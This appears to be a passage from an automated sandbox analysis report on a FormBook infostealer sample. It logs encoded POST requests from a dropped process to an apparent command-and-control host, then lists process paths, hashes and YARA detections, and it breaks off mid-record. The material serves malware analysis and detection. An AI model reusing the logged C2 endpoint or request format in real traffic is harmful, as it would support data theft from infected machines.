Aug 31, 2024 14:06:58.557638884 CEST	1236	IN	Data Raw: ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56 c6 2f 69 dd 82 c9 52 11 dc 2d f9 d9 e6 40 30 1b c9 91 08 09 01 37 88 8a Data Ascii: Fu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OTW^+;V_[.i.:B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	58143	188.114.96.3	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:07:00.326338053 CEST	726	OUT	POST /ps9q/ HTTP/1.1 Host: www.x0x9x8x8x7x6.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.x0x9x8x8x7x6.shop Referer: http://www.x0x9x8x8x7x6.shop/ps9q/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 39 69 4f 48 69 74 45 6a 46 62 4f 5a 68 4f 54 55 6f 44 4f 52 68 63 46 6a 47 6c 4a 49 42 4e 44 4b 76 75 52 7a 44 6c 37 61 56 79 64 6f 32 6f 55 6e 61 56 49 36 6d 32 42 34 74 30 4c 66 33 4a 35 52 4e 50 51 36 47 38 75 73 70 68 42 59 65 73 2f 39 42 69 54 51 57 41 61 5a 65 75 67 78 39 53 74 4b 77 45 59 35 4e 4f 2b 7a 31 6d 66 35 44 51 43 4b 74 31 49 4f 5a 69 6e 6c 34 6e 41 52 38 64 46 67 79 49 56 70 71 77 6a 4d 6c 77 58 49 45 50 66 6e 6a 41 4e 76 76 63 74 66 58 76 6d 4e 2b 68 43 4b 74 30 42 73 49 54 61 4d 61 78 2f 67 2f 51 78 45 48 6b 63 54 71 30 61 39 30 4d 34 50 63 4f 64 4e 65 51 41 72 76 71 54 78 64 67 6f 72 78 4a 43 72 4c 53 38 68 38 33 4d 3d Data Ascii: ZXzt1jdX=9iOHitEjFbOZhOTUoDORhcFjGlJIBNDKvuRzDl7aVydo2oUnaVI6m2B4t0Lf3J5RNPQ6G8usphBYes/9BiTQWAaZeugx9StKwEY5NO+z1mf5DQCKt1IOZinl4nAR8dFgyIVpqwjMlwXIEPfnjANvvctfXvmN+hCKt0BsITaMax/g/QxEHkcTq0a90M4PcOdNeQArvqTxdgorxJCrLS8h83M=
Aug 31, 2024 14:07:00.963885069 CEST	1125	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:07:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbT6CQAPJlmA5JGRHgMvWp5EKS%2FIs6ab7fKz5XPUHL4pbXCR9VoliCvNbR4BdhoThL8TnVifD%2FRf9g946k%2FegTvlJdDfiQfXk4tvB8Npyor2ITUJvOBZ%2F%2Fe6oF1uFUzmfLdyFykMDj4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce5d58e966a52-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED] Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Aug 31, 2024 14:07:01.131850004 CEST	1236	IN	Data Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5 Data Ascii: 7ffa$Z<\|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`\|
Aug 31, 2024 14:07:01.131865978 CEST	224	IN	Data Raw: 79 58 2e 11 01 9f 79 97 c5 c9 8a c2 59 7b a5 4b cd cf 58 8c a2 30 4e c5 94 c7 8c 03 2b db 17 be 6d fe c5 91 fc b7 88 f7 7d d5 65 ee d3 78 7f cd 06 ea a1 ae f9 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 Data Ascii: yX.yY{KX0N+m}ex$u'Gu1?F/vgJ*F`&b\|xSKXr3F _g5`+jGB`%M;k\|>,#T15&2k!
Aug 31, 2024 14:07:01.132092953 CEST	1236	IN	Data Raw: 99 3b ae 3f e9 69 49 6e 4a 6f 04 85 11 36 fe 77 69 9e b9 1c ae b5 31 71 e5 6e f6 6b 1c 5d dc 5e 1a a1 68 1f 7a 33 26 97 fe 59 be 16 ea 3d bb c4 0f 67 6d 2b 50 32 62 19 cd aa 5b 32 d5 b9 c6 a6 bf b5 fc fe 35 a2 b9 3d 98 37 36 80 01 8f 95 47 c5 b5 Data Ascii: ;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=76Go`"apKc\|O^U%{z]c*T7ROv"&o>i=$,3u[e6>mB%4RK+G]nWyt4$x"X`o)i
Aug 31, 2024 14:07:01.132102966 CEST	1236	IN	Data Raw: 8b 05 21 e2 05 22 36 9a c7 8b 6e f1 74 6f 4d 65 e3 74 1d b6 5a 51 84 bc 7a a4 e9 56 9a 5c c0 8f 5d 7b 55 92 cd dd 31 4f 89 b6 dc b6 da 0b bb 31 85 51 02 c6 40 88 f6 b1 94 06 d6 c6 e7 a2 cd 91 14 5a 67 ba cc 2a 1c ae 95 c2 29 04 fa 40 0c b1 da e4 Data Ascii: !"6ntoMetZQzV\]{U1O1Q@Zg)@GD+af2?~5@@L,@6M-qn{gfgL}w]?cbxg6&.M&5@w{(\|gB4sQ-kA
Aug 31, 2024 14:07:01.132113934 CEST	1236	IN	Data Raw: cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8 c6 ca d9 21 b7 07 c4 b0 69 9c 92 3c a1 fe f4 4e 07 cf 4e 30 10 6c fe 7e 54 20 48 3b f6 31 ae a4 51 65 2c e7 06 f7 74 0c e2 69 a3 ed ca e9 c3 12 7e 9b fe 76 47 f4 48 53 2b 0a 27 89 78 5a d7 95 a4 Data Ascii: /Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh\|FOT0Vk`++p:V(tEqFNEU\K!v2BX29O7i-oeqSBM);x%
Aug 31, 2024 14:07:01.132122993 CEST	1236	IN	Data Raw: 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32 94 a3 ee 0f f3 66 2f 6f 34 23 4d da Data Ascii: +]d2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye+Ab
Aug 31, 2024 14:07:01.132134914 CEST	1236	IN	Data Raw: d2 d4 3d 23 8b f2 5c 1b 53 ab d1 a4 b9 7e 5f 78 08 88 36 4c e4 7e f0 22 3a 51 dd e9 28 68 e6 c6 e9 6c aa 6e ef 8b 4b e3 b7 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 Data Ascii: =#\S~_x6L~":Q(hlnKl/}\67!k6gv=RuXLq>?gL^6$4wl#f0aFf!`XK4<B}T4JzMpyuD<_!E:\\Cb0) e=]JK
Aug 31, 2024 14:07:01.132144928 CEST	1236	IN	Data Raw: 73 ba c2 df f8 e3 42 7f 1a ff 73 7e d8 f2 54 97 39 67 3e 68 c8 25 62 0c 6b 5f 71 02 f6 b9 c9 47 2e a4 6d a2 ac 41 83 2d 15 24 22 ce 64 26 3f e4 d7 88 bd 06 6d ec d7 34 9c 12 b4 f3 71 c9 42 e8 5c fb 87 98 42 9d f9 0d 93 ae 2a f3 51 86 c1 d5 e4 31 Data Ascii: sBs~T9g>h%bk_qG.mA-$"d&?m4qB\B*Q1EivLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=
Aug 31, 2024 14:07:01.132153988 CEST	1236	IN	Data Raw: b4 59 ae 44 d2 6f cc af 5a 6c 36 6c 56 1f 30 45 ea 17 89 80 37 b8 85 6b 54 58 0f a4 c0 83 c0 5c 8e 52 11 88 29 fb 09 1b 1b 89 95 99 8b fa 47 bf fd 6b ad 0d f9 75 62 cd e7 11 b2 91 97 b6 94 2e 5c 1a 4a 0e 06 f1 74 e7 74 6a d9 9d 82 3d ce da b9 0b Data Ascii: YDoZl6lV0E7kTX\R)Gkub.\Jttj=j>Y}b9CP9CwX%\|q%6h nfd@yx'AA $-5_^[vvm>A?ueKQi%Rmt
Aug 31, 2024 14:07:01.132163048 CEST	1236	IN	Data Raw: 42 e7 2a d1 11 55 3a d5 0a be 1c 7d f5 79 63 20 ee 4c ce 47 f6 ec af 03 b3 78 65 a4 f8 6f 20 df 2f 88 05 c0 d7 74 2f 85 03 c1 35 8f 35 93 a8 2f 9d 38 59 5b d0 33 5a 0d c7 a8 4d d1 ad cd 57 87 0b ff 4b 5c a2 bc f5 22 f2 ee 1a c1 94 bb 43 56 9f 33 Data Ascii: B*U:}yc LGxeo /t/55/8Y[3ZMWK\"CV3th}sB(B.Kh$F-A~mG`6>6/y&6kdCisaMV ,61{u1D%mf`; zk2fmt$.`NFu@rX

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	58144	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:07:03.194960117 CEST	10808	OUT	POST /ps9q/ HTTP/1.1 Host: www.x0x9x8x8x7x6.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.x0x9x8x8x7x6.shop Referer: http://www.x0x9x8x8x7x6.shop/ps9q/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 39 69 4f 48 69 74 45 6a 46 62 4f 5a 68 4f 54 55 6f 44 4f 52 68 63 46 6a 47 6c 4a 49 42 4e 44 4b 76 75 52 7a 44 6c 37 61 56 79 6c 6f 33 5a 30 6e 62 30 49 36 38 32 42 34 67 55 4c 61 33 4a 35 4d 4e 50 49 2b 47 38 69 53 70 6a 35 59 65 4f 6e 39 45 54 54 51 64 41 61 5a 58 4f 67 77 77 79 74 6c 77 45 49 31 4e 4f 75 7a 31 6d 66 35 44 53 61 4b 6b 41 30 4f 4b 53 6e 69 75 33 41 6e 74 74 45 75 79 49 38 63 71 77 33 36 6b 45 62 49 64 76 76 6e 77 43 31 76 77 73 74 52 57 76 6e 4c 2b 68 47 76 74 30 64 61 49 54 47 69 61 32 58 67 76 48 77 75 55 6e 38 5a 38 53 4f 44 70 72 59 6b 53 4f 46 62 65 48 45 69 6e 61 2f 5a 4c 41 63 50 37 4b 36 6b 55 77 51 6c 72 7a 69 48 65 41 50 74 4f 44 53 59 70 4b 54 4e 72 58 73 4a 62 47 33 48 35 65 67 73 37 57 32 39 5a 53 73 55 52 6b 69 69 6a 67 41 63 31 62 62 58 38 62 2f 49 2f 2f 56 4b 39 45 58 32 74 77 71 64 49 38 57 36 45 41 63 37 33 61 38 30 52 77 4e 4f 6a 49 67 53 5a 44 42 6a 50 6a 4a 63 44 41 67 4d 49 46 41 52 69 42 65 73 62 55 67 53 39 7a 5a 4a 55 76 41 43 2f [TRUNCATED] Data Ascii: ZXzt1jdX=9iOHitEjFbOZhOTUoDORhcFjGlJIBNDKvuRzDl7aVylo3Z0nb0I682B4gULa3J5MNPI+G8iSpj5YeOn9ETTQdAaZXOgwwytlwEI1NOuz1mf5DSaKkA0OKSniu3AnttEuyI8cqw36kEbIdvvnwC1vwstRWvnL+hGvt0daITGia2XgvHwuUn8Z8SODprYkSOFbeHEina/ZLAcP7K6kUwQlrziHeAPtODSYpKTNrXsJbG3H5egs7W29ZSsURkiijgAc1bbX8b/I//VK9EX2twqdI8W6EAc73a80RwNOjIgSZDBjPjJcDAgMIFARiBesbUgS9zZJUvAC/imlcwqwa6qZTCpCMHLx4w0OY+wt0mkYFAwDhZfOulp3WKDx2pn8bLdB10P5mXb7sHlxDbVrUPJ8B5hTybt39iqH8WI7hSSAU8LHCv1+UYAEZCLK0etD/4npXJptQGn57iY6Jr36Iu+9wuu9GSul32IXo6+Ux32SStwYDzWIRj62HAjOHVEqO0UeOIC26x2a20rRlbdwUxPcSQFNk4vdTWqOgtySD/RqUnV4XCJs6b5MzOlNsH5FlOE7cG5TRyGiLELBPnsKFsyB9FijZzafkLvAH7mDlad/87FOvErQaiuvE2vq/mEtm0gJSCNW9BwomKAGM93Lw6tgERNqJ8MhpUnVnrU5vxbe2zHYe5cImYqggCFRdmFK0RkecRs5alZsmBNCqUjElCSfj3ytOrlWe7MA+KNbeT3f3HLFFGOB51Ab4BaweertP5687okF7vX1MYgDkl8VsAO5qdgZdWqQ6Cl/uBV8CVsTA9NYS/8qW54zDoT7nqwHpkkaBhu4fqEvsYPYT8zjkkgpjrH1klD6I3YReIfP8zNLLNf2GEyH/2SOWiejtvVobjbi/bhUvZZJX0JLRxcsqUzJVNYL2i/1XsWlMIOxPZTRu7+/5v4fFhrPOPK0zLFkE9oSGa/jBdFHgE2+wc9e9tKmGgCBhORaX+79slmFgD40+jM [TRUNCATED]
Aug 31, 2024 14:07:03.826123953 CEST	1125	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:07:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYAriX6xP8gM%2FYPvnfRxxxNcjpOVRrattKGMXPfM850NrWPTBUECdQcHYnLHZBY5DGLMiPFzuTfRB6xHTcsK9HHMpZWw%2BBICfLMcAO%2B6ldSte92yf62BkMOb6hOADfN05p%2BUu%2BsSasE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce5e78bed187d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED] Data Ascii: 1ed\|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\\|!+jZAeZq)jAo\|m5ka',Fk6x>DAbU.>y^-RSo6B)m8wln}weQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Aug 31, 2024 14:07:03.974883080 CEST	1236	IN	Data Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5 Data Ascii: 7ffa$Z<\|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`\|
Aug 31, 2024 14:07:03.974896908 CEST	1236	IN	Data Raw: 79 58 2e 11 01 9f 79 97 c5 c9 8a c2 59 7b a5 4b cd cf 58 8c a2 30 4e c5 94 c7 8c 03 2b db 17 be 6d fe c5 91 fc b7 88 f7 7d d5 65 ee d3 78 7f cd 06 ea a1 ae f9 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 Data Ascii: yX.yY{KX0N+m}ex$u'Gu1?F/vgJ*F`&b\|xSKXr3F _g5`+jGB`%M;k\|>,#T15&2k!;?iInJo6wi
Aug 31, 2024 14:07:03.974910975 CEST	1236	IN	Data Raw: 62 f7 89 63 8d 5f be 66 94 f9 a6 eb be ed a8 9a 3f 6b dd 30 82 84 20 16 ce d9 1f 63 fa 3a 46 1f 2a d6 84 d9 54 83 84 73 47 ab 2d bb 5c 12 87 70 c6 0d 4d 0f 3f 5c 22 1d d8 cf f6 df 2f 52 25 05 52 ca 48 9f 07 41 20 bb 9a 0c c8 36 7b 8c 79 dd 0f da Data Ascii: bc_f?k0 c:F*TsG-\pM?\"/R%RHA 6{yM5] hGFS!+=`Rj#Kutf%:1\|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMet
Aug 31, 2024 14:07:03.974926949 CEST	1236	IN	Data Raw: 72 b7 bf ea 4c 51 db 2e f8 52 fd 56 ca 58 2b fa d9 b7 a1 70 32 6b 22 38 58 ab 34 55 a9 af 4c 13 0a db 32 b0 23 5a 72 f2 96 ed b7 bc 57 34 7f 54 da c6 8f 61 24 8b 84 c3 f8 45 89 1c 28 98 57 bb 58 3f 50 8a 27 d4 cf a9 14 c6 aa 76 c3 f2 f5 1f 7f 1f Data Ascii: rLQ.RVX+p2k"8X4UL2#ZrW4Ta$E(WX?P'v#('?_$z.$\|IPCp{.'rfbOw? 0{FAyV{1yZ7%]#}V[pj80gU@ICtv$PvBa/Z
Aug 31, 2024 14:07:03.974937916 CEST	1236	IN	Data Raw: 6e ae 6f 0e 0d db d0 11 93 62 19 f1 71 f5 78 8a bb bf 05 12 1e 23 c7 6f 88 4f 3c 9c ac df 45 5e 48 42 40 b8 2f 08 2e a1 04 9a fb 7d be 29 47 a8 3d 54 19 bf 01 a7 79 5c fb 61 e6 8d 3a 5c 88 0a 3a cd c8 14 d1 8f 0b 24 95 f7 fb 2e 96 a3 86 5c 66 b3 Data Ascii: nobqx#oO<E^HB@/.})G=Ty\a:\:$.\ffM>}#fO<g[)rVi_?ChHCM$OpipW 6^NZI$~}RHNcvNK;i{vG9~{+]d2
Aug 31, 2024 14:07:03.974952936 CEST	1236	IN	Data Raw: 39 3a b9 32 00 8e f6 61 2f 55 31 a1 d3 e8 d1 c1 b6 6f 60 83 9f ec 1c b7 ed 20 c7 b8 39 bf b0 62 7a 91 e0 46 01 26 a7 d4 8a 20 68 72 e0 76 3a 04 e1 b9 de 8e cd 1d 7e 5f 02 c2 c6 4e 74 c3 d8 e9 3b 3d 69 4d 69 07 6f b3 0f 51 87 e4 32 d3 af ab b0 42 Data Ascii: 9:2a/U1o` 9bzF& hrv:~_Nt;=iMioQ2BjN7=FN~WYFS0Zv&+/Ce}c6(a57mkp1tj_W5a\|nRtu?;j(\|FW&2nq^+g0/M>YZ=#\S~_x6
Aug 31, 2024 14:07:03.974966049 CEST	776	IN	Data Raw: e5 45 54 ae a3 41 7a a2 e4 ae e4 11 49 f0 84 65 33 c5 29 d0 96 d1 6a 3a 08 20 23 d8 2d 18 48 aa 57 15 63 f5 e5 6f a2 e3 06 d6 e3 a4 58 f4 bf 6f ad 50 01 81 8e 3f 84 a9 df 3c 99 14 79 4f 34 5f 8d cf f5 9b 48 d2 fd e3 36 cb 26 df 3d 73 1c 23 14 9f Data Ascii: ETAzIe3)j: #-HWcoXoP?<yO4_H6&=s#` m^MZL[GWc-K8gY"p>9,<G}; ]J11m@n2`-l\zvHRbyMzJk)mXZnsBs~T9g>
Aug 31, 2024 14:07:03.974984884 CEST	1236	IN	Data Raw: 12 0a 8b d3 a1 2d 1c 5d dd 1e 43 3f 21 fb 9c d1 24 02 5a b1 ef 2a 63 fa df f7 45 8a 53 27 88 44 b5 f9 55 f1 df c8 7d e8 69 9d 64 e7 65 8f 87 4d 7c 6c 93 f0 4b 11 e5 41 57 1d fc 25 62 a9 3e ea 68 f5 10 c0 64 0c 8e 16 6d 4f 08 63 b7 2f 66 f4 91 8d Data Ascii: -]C?!$Z*cES'DU}ideM\|lKAW%b>hdmOc/f NgZln)A5+#,)",'+3e(XxNxx[#]Zg61otf:DuutZI)FND),Nbd#N/M\4O=S
Aug 31, 2024 14:07:03.975020885 CEST	1236	IN	Data Raw: 1e 83 4f 75 6a a9 9b 8a 35 b2 e0 50 de 47 e6 16 1e 8f a3 60 db dc 42 c9 24 7e b1 a0 20 41 3c 02 53 58 c1 26 be a9 63 0f 92 67 0f 88 cb eb 4c 3b 13 9f a0 d6 e0 25 fc 9b ed 57 d6 cb 32 e4 e8 80 83 c5 49 87 ac 8d bc f3 10 a8 8e 4d df 79 81 54 48 8f Data Ascii: Ouj5PG`B$~ A<SX&cgL;%W2IMyTH+zCfQVw;5Q"\|-`NlP;,\|riMZREQTK"drwL4??4Y"&sT0SW>i~p}YO-+LU8^
Aug 31, 2024 14:07:03.975030899 CEST	1236	IN	Data Raw: 71 7d 7d 7c 1b 4f be 3d 3c 15 41 6a 02 b5 31 97 79 68 8e 10 54 3a b1 7a a9 7f c8 fb 48 d0 d2 63 f9 47 0c cd 65 cf 87 ae b8 dc b7 d8 59 2c 7c e7 2d 34 48 f3 ce 5f 5e a9 dd 89 ad 50 19 ea 14 3f a1 a3 d3 6b c2 84 17 6b e3 9d 97 dd 5b 3e 3d 58 29 4a Data Ascii: q}}\|O=<Aj1yhT:zHcGeY,\|-4H_^P?kk[>=X)JVXfhDXCXl"Q\|x\:5'{+OM){Sq#9]Fd"L\yLkge[4bTR.18tCwK-B!S

Target ID:	0
Start time:	08:02:54
Start date:	31/08/2024
Path:	C:\Users\user\Desktop\play.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\play.exe"
Imagebase:	0xba0000
File size:	382'976 bytes
MD5 hash:	22B582F31BD1C3A4345DF16DB968B74C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:03:28
Start date:	31/08/2024
Path:	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe"
Imagebase:	0xa90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:03:31
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\relog.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\relog.exe"
Imagebase:	0x940000
File size:	45'568 bytes
MD5 hash:	DA20D543A130003B427AEB18AE2FE094
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 